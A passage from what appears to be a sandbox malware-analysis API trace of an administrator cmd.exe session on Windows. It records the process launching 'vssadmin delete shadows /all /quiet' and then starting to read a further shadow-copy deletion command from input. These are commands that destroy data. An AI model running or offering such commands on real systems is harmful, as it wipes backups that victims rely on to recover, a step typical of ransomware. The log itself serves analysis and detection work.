lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.409] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0124.409] GetProcessHeap () returned 0x2e0000 [0124.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x104) returned 0x2f9be0 [0124.409] GetProcessHeap () returned 0x2e0000 [0124.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1f8) returned 0x2f9cf0 [0124.414] GetProcessHeap () returned 0x2e0000 [0124.414] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9cf0, Size=0x106) returned 0x2f9cf0 [0124.414] GetProcessHeap () returned 0x2e0000 [0124.414] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9cf0) returned 0x106 [0124.414] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.414] GetProcessHeap () returned 0x2e0000 [0124.414] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2f5be0 [0124.414] GetProcessHeap () returned 0x2e0000 [0124.414] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f5be0, Size=0x7e) returned 0x2f5be0 [0124.415] GetProcessHeap () returned 0x2e0000 [0124.415] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f5be0) returned 0x7e [0124.453] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.453] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0x2f5c70 [0124.453] GetProcessHeap () returned 0x2e0000 [0124.453] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x28) returned 0x2f4640 [0124.453] FindClose (in: hFindFile=0x2f5c70 | out: hFindFile=0x2f5c70) returned 1 [0124.453] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0124.454] GetLastError () returned 0x2 [0124.454] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0x2f5c70 [0124.454] GetProcessHeap () returned 0x2e0000 [0124.454] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f4640, Size=0x8) returned 0x2f98d0 [0124.454] FindClose (in: hFindFile=0x2f5c70 | out: hFindFile=0x2f5c70) returned 1 [0124.454] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0124.454] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0124.454] GetConsoleTitleW (in: lpConsoleTitle=0x1ef6a0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.454] GetProcessHeap () returned 0x2e0000 [0124.454] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2fb2a0 [0124.454] GetConsoleTitleW (in: lpConsoleTitle=0x2fb2b0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.454] GetProcessHeap () returned 0x2e0000 [0124.454] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fb2a0, Size=0xc0) returned 0x2fb2a0 [0124.454] GetProcessHeap () returned 0x2e0000 [0124.455] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fb2a0) returned 0xc0 [0124.455] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0124.455] GetProcessHeap () returned 0x2e0000 [0124.455] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb2a0 | out: hHeap=0x2e0000) returned 1 [0124.455] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef458, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef418 | out: lpAttributeList=0x1ef458, lpSize=0x1ef418) returned 1 [0124.455] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef458, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef458, lpPreviousValue=0x0) returned 1 [0124.455] GetStartupInfoW (in: lpStartupInfo=0x1ef570 | out: lpStartupInfo=0x1ef570*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9c, hStdOutput=0xa8, hStdError=0xa8)) [0124.455] GetProcessHeap () returned 0x2e0000 [0124.455] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4640 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0124.456] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0124.457] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0124.457] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0124.457] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0124.457] GetProcessHeap () returned 0x2e0000 [0124.457] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4640 | out: hHeap=0x2e0000) returned 1 [0124.457] GetProcessHeap () returned 0x2e0000 [0124.457] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2f8900 [0124.457] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ef490*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef440 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x1ef440*(hProcess=0x54, hThread=0x50, dwProcessId=0x328, dwThreadId=0x5bc)) returned 1 [0124.465] CloseHandle (hObject=0x50) returned 1 [0124.465] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0124.465] GetProcessHeap () returned 0x2e0000 [0124.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8a60 | out: hHeap=0x2e0000) returned 1 [0124.465] GetEnvironmentStringsW () returned 0x2f8a60* [0124.465] GetProcessHeap () returned 0x2e0000 [0124.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xac4) returned 0x2fb2a0 [0124.465] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0124.465] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76d30000 [0124.466] GetProcAddress (hModule=0x76d30000, lpProcName="NtQueryInformationProcess") returned 0x76d814a0 [0124.466] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x1eed48, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1eed48, ReturnLength=0x0) returned 0x0 [0124.466] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffd4000, lpBuffer=0x1eed80, nSize=0x380, lpNumberOfBytesRead=0x1eed40 | out: lpBuffer=0x1eed80*, lpNumberOfBytesRead=0x1eed40*=0x380) returned 1 [0124.466] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0208.587] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1ef388 | out: lpExitCode=0x1ef388*=0x0) returned 1 [0208.587] CloseHandle (hObject=0x54) returned 1 [0208.587] _vsnwprintf (in: _Buffer=0x1ef5f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef398 | out: _Buffer="00000000") returned 8 [0208.587] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0208.587] GetProcessHeap () returned 0x2e0000 [0208.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb2a0 | out: hHeap=0x2e0000) returned 1 [0208.587] GetEnvironmentStringsW () returned 0x2fe870* [0208.587] GetProcessHeap () returned 0x2e0000 [0208.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2ff370 [0208.587] FreeEnvironmentStringsW (penv=0x2fe870) returned 1 [0208.587] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0208.587] GetProcessHeap () returned 0x2e0000 [0208.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ff370 | out: hHeap=0x2e0000) returned 1 [0208.587] GetEnvironmentStringsW () returned 0x2fe870* [0208.587] GetProcessHeap () returned 0x2e0000 [0208.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2ff370 [0208.587] FreeEnvironmentStringsW (penv=0x2fe870) returned 1 [0208.587] GetProcessHeap () returned 0x2e0000 [0208.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8900 | out: hHeap=0x2e0000) returned 1 [0208.588] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef458 | out: lpAttributeList=0x1ef458) [0208.588] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0208.588] _get_osfhandle (_FileHandle=1) returned 0xa8 [0208.588] SetConsoleMode (hConsoleHandle=0xa8, dwMode=0x0) returned 0 [0208.588] _get_osfhandle (_FileHandle=1) returned 0xa8 [0208.588] GetConsoleMode (in: hConsoleHandle=0xa8, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 0 [0208.588] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.588] GetConsoleMode (in: hConsoleHandle=0x9c, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 0 [0208.589] GetConsoleOutputCP () returned 0x1b5 [0208.589] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0208.589] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5be0 | out: hHeap=0x2e0000) returned 1 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9cf0 | out: hHeap=0x2e0000) returned 1 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb240 | out: hHeap=0x2e0000) returned 1 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5b70 | out: hHeap=0x2e0000) returned 1 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9880 | out: hHeap=0x2e0000) returned 1 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4610 | out: hHeap=0x2e0000) returned 1 [0208.589] GetProcessHeap () returned 0x2e0000 [0208.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f97c0 | out: hHeap=0x2e0000) returned 1 [0208.589] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef8b8 | out: _Buffer="\r\n") returned 2 [0208.589] _get_osfhandle (_FileHandle=1) returned 0xa8 [0208.589] GetFileType (hFile=0xa8) returned 0x3 [0208.589] _get_osfhandle (_FileHandle=1) returned 0xa8 [0208.589] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0208.589] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef888, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef888*=0x2, lpOverlapped=0x0) returned 1 [0208.590] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0208.590] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0208.590] _vsnwprintf (in: _Buffer=0x4ab3eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef8c8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0208.590] _vsnwprintf (in: _Buffer=0x4ab3eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1ef8c8 | out: _Buffer=">") returned 1 [0208.590] _get_osfhandle (_FileHandle=1) returned 0xa8 [0208.590] GetFileType (hFile=0xa8) returned 0x3 [0208.590] _get_osfhandle (_FileHandle=1) returned 0xa8 [0208.590] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0208.590] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1ef8b8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef8b8*=0x14, lpOverlapped=0x0) returned 1 [0208.590] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.590] GetFileType (hFile=0x9c) returned 0x3 [0208.590] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.590] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.590] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.590] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e320, cchWideChar=1 | out: lpWideCharStr="wssadmin delete shadows /all /quiet\n") returned 1 [0208.590] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.590] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.590] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.590] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e322, cchWideChar=1 | out: lpWideCharStr="msadmin delete shadows /all /quiet\n") returned 1 [0208.590] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.590] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.590] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.590] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e324, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1 [0208.590] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.590] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.590] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e326, cchWideChar=1 | out: lpWideCharStr="cdmin delete shadows /all /quiet\n") returned 1 [0208.591] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.591] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.591] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e328, cchWideChar=1 | out: lpWideCharStr=" min delete shadows /all /quiet\n") returned 1 [0208.591] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.591] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.591] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32a, cchWideChar=1 | out: lpWideCharStr="sin delete shadows /all /quiet\n") returned 1 [0208.591] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.591] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.591] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32c, cchWideChar=1 | out: lpWideCharStr="hn delete shadows /all /quiet\n") returned 1 [0208.591] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.591] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.591] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32e, cchWideChar=1 | out: lpWideCharStr="a delete shadows /all /quiet\n") returned 1 [0208.591] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.591] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.591] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e330, cchWideChar=1 | out: lpWideCharStr="ddelete shadows /all /quiet\n") returned 1 [0208.591] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.591] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.591] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e332, cchWideChar=1 | out: lpWideCharStr="oelete shadows /all /quiet\n") returned 1 [0208.591] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.591] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.591] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e334, cchWideChar=1 | out: lpWideCharStr="wlete shadows /all /quiet\n") returned 1 [0208.591] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.591] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.591] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e336, cchWideChar=1 | out: lpWideCharStr="cete shadows /all /quiet\n") returned 1 [0208.592] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.592] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.592] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, 